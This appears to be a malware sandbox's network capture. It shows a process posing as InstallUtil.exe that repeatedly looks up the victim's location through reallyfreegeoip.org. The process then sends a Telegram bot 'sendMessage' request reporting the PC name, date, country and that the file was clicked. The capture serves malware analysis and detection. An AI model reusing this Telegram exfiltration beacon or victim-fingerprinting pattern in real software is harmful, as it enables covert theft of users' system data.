0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-12 19:07:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49719	188.114.97.3	443	1072	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-12 19:07:44 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-12 19:07:45 UTC	710	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:07:44 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 0 Last-Modified: Thu, 12 Sep 2024 19:07:44 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VwoXOxUvR2L6FOaS%2FGrlzzgNVBQlGNac%2FUo3BrOWTRtR3131HY%2BeMLFN1jto3SGvlyvV83iw6QKuHD4qV4uSGYTw%2Fys6%2BCQQQaKxNt3RBISENn2xd8M16EnbvJDDfvtxxIIgN%2Fj%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c222ea5e9b1423d-EWR alt-svc: h3=":443"; ma=86400
2024-09-12 19:07:45 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-12 19:07:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49721	188.114.97.3	443	1072	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-12 19:07:46 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-12 19:07:46 UTC	708	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:07:46 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 2 Last-Modified: Thu, 12 Sep 2024 19:07:44 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cxxjj8Ej92TSb1uGZRtRhbkeo7I9tnf%2FX529OClbjGSJz2Q68QMfR%2Bfp1%2BIjHGcAPUhEAc0roSBmvUmk%2BAvKvkIJiCjoG45OEEnQ%2FeQijLyRwXLocKqTh%2BVAmwvyeMrZ6PzkJJZj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c222eaf4f69433f-EWR alt-svc: h3=":443"; ma=86400
2024-09-12 19:07:46 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-12 19:07:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49723	188.114.97.3	443	1072	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-12 19:07:47 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-12 19:07:47 UTC	704	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:07:47 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 3 Last-Modified: Thu, 12 Sep 2024 19:07:44 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a7KLnGbJyFNeja49vkOlnCSyChJD56X6eSvldcJueEMSXOYORCxsdhmgKfpXc2%2BN%2Fb%2BbZltisRgSr4ahf78NV65zwYIZ6WX%2FvHVOEB8KhtMjcSO0W1SfV35M9euXN1NBSAmo2cPt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c222eb78eae8cca-EWR alt-svc: h3=":443"; ma=86400
2024-09-12 19:07:47 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-12 19:07:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49725	188.114.97.3	443	1072	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-12 19:07:48 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-12 19:07:49 UTC	702	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:07:49 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 5 Last-Modified: Thu, 12 Sep 2024 19:07:44 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=obTczBN5BZJLNsCmZc3IXh7hmwuBlehS3vwx5rjciPSeV7BLxx%2FO43rso0jhxDN%2FuyS263t7qaTMpCVlnmaUfJf19nhMyD1RTGtYX7S78NHMYQnrLnaJP8lVXsa5phnV6zyR%2BKwj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c222ebfbaaf5e6c-EWR alt-svc: h3=":443"; ma=86400
2024-09-12 19:07:49 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-12 19:07:49 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49727	188.114.97.3	443	1072	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-12 19:07:50 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-12 19:07:50 UTC	704	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:07:50 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 6 Last-Modified: Thu, 12 Sep 2024 19:07:44 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VACwKbtTKN%2Bhr7uXjBMwxUPuc6k1CBHfVNuabXrRKv3W2cfD%2FJEnBGooSa3%2BKQQROPhrVNGwNMNYmQN6PPMJcMNK4WyaP2wUwtFCyO%2BEyQySDpuIJK9KxyP80Vraz6Tk6REp0T5C"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c222ec8b8a67d11-EWR alt-svc: h3=":443"; ma=86400
2024-09-12 19:07:50 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-12 19:07:50 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49729	188.114.97.3	443	1072	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-12 19:07:51 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-12 19:07:52 UTC	706	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:07:52 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 8 Last-Modified: Thu, 12 Sep 2024 19:07:44 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FVxWneoc9J%2FoBcst5KC8StrYV8sqR1bjF7YnSq7l2gtA9RpO7Swyy%2B2L8IahNzdWECvto4c6LqxRlXvljijinfvWBunoWAZUSyf6KbZdnS2D4W%2BUXWbwxQ%2BQQTAq0heD3CIJqAKH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c222ed2584941fe-EWR alt-svc: h3=":443"; ma=86400
2024-09-12 19:07:52 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-12 19:07:52 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.9	49731	188.114.97.3	443	1072	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-12 19:07:54 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-12 19:07:54 UTC	707	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:07:54 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 10 Last-Modified: Thu, 12 Sep 2024 19:07:44 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6JsxfSNrT92DSAo8xsp7al0V48rNofdWSe1%2FN2WdxP7LhMzIxt%2BVk14Z2czfBlljb2VFSzhytPcbp2%2Fir3n0jONRPmU3%2BkF%2BFYJvrEhk6oepGIBtCr11xWJzisQHAtIfSXbjNK0r"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c222ee1181041e3-EWR alt-svc: h3=":443"; ma=86400
2024-09-12 19:07:54 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-12 19:07:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.9	49733	188.114.97.3	443	1072	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-12 19:07:55 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-12 19:07:55 UTC	705	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:07:55 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 11 Last-Modified: Thu, 12 Sep 2024 19:07:44 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9A3nVoZAAqK2P7EQE%2BCH0MdMfOI39b%2FQa%2FJ0wuuS7JXMXEpfLNwAJOANqOJ9DkBuQw3anBhQpCBt6QzrZ1rZg68DKdi1gKMZwJUVj4y%2B30v7dNyKu6BeHAn6qwKqrxMI6qQiBG7o"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c222ee93c528cec-EWR alt-svc: h3=":443"; ma=86400
2024-09-12 19:07:55 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-12 19:07:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.9	49734	149.154.167.220	443	1072	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-12 19:07:56 UTC	345	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:701188%0D%0ADate%20and%20Time:%2013/09/2024%20/%2005:40:24%0D%0ACountry%20Name:%20United%20States%0D%0A[%20701188%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-09-12 19:07:56 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 12 Sep 2024 19:07:56 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-12 19:07:56 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.9	49736	188.114.97.3	443	2036	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-12 19:08:01 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-12 19:08:02 UTC	709	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:08:02 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 18 Last-Modified: Thu, 12 Sep 2024 19:07:44 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z%2F5FqEpmJzaKAdB47TeFCEEcEwd7N9E%2BwYoFo0YaVudIYQBn8uhQFsQ1Apm%2F5Cx7UPeBIG0K4ohBiI3G10tKdunZxq0%2FtCQBjbHHZmpfz%2FPqEVPvHi9%2B4fzhDSGUr32xx9sQNGd3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c222f1099838cb1-EWR alt-svc: h3=":443"; ma=86400
2024-09-12 19:08:02 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-12 19:08:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.9	49738	188.114.97.3	443	2036	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-12 19:08:02 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-12 19:08:02 UTC	709	IN	HTTP/1.1 200 OK Date: Thu, 12 Sep 2024 19:08:02 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 18 Last-Modified: Thu, 12 Sep 2024 19:07:44 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T69gqi14WiCAmCJYwSX7jdh5SeTEujVLUb4%2FhVwINzaT%2FfgaTjUCqVVDH%2F8HGf51gJaDwtSKK5enZsB6nqgIKqLYwoW0tn1APs7Q7aR%2BMJeH6pNLL6%2Fg3JTXHOW9Q2lD%2B20HmIRk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c222f15de2b8c8d-EWR alt-svc: h3=":443"; ma=86400
